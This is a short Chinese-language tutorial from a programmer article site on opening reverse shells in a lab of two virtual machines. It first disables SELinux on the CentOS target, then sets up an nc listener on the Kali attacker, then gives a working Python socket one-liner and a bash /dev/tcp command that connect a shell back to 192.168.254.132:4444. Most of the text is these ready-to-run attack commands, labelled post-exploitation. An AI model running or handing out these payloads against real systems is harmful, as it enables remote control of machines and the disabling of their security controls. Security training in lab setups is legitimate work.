欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

使用python和bash反弹shell的方法详解

程序员文章站 2022-03-09 22:42:15
...

实验环境:

攻击(攻击者)主机:      

Kali2020.2   虚拟机                                            

nat                 

192.168.254.132                            

目标(受害者)主机:        

Centos_6.9    虚拟机          

Nat    

Vmnet1          

192.168.254.173                      

192.168.10.14                                                                

使用python和bash反弹shell的方法详解

【步骤一】:保持防火墙开启状态,关闭setenforce,结果如【图1】所示:

【命令】

setenforce 0   //设置SELinux 成为permissive模式 临时关闭selinux的 
service iptables status  //查看防火墙状态

 

使用python和bash反弹shell的方法详解

图1

Python反弹shel l:

【步骤二】:kali使用nc进行对本机的4444端口进行监听,目标主机执行下面python命令:,结果如【图2】所示:

【命令】

//kali使用nc进行对本机的4444端口进行监听:
nc -lvvp 4444
//目标主机执行下面python命令:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

使用python和bash反弹shell的方法详解

图2

Bash的方式:

【步骤三】:使用bash的方式反弹shell,结果如【图3】所示:

【命令】

nc -lvvp 4444
bash -i >& /dev/tcp/192.168.254.132/4444 0>&1

使用python和bash反弹shell的方法详解

图3

相关标签: 后渗透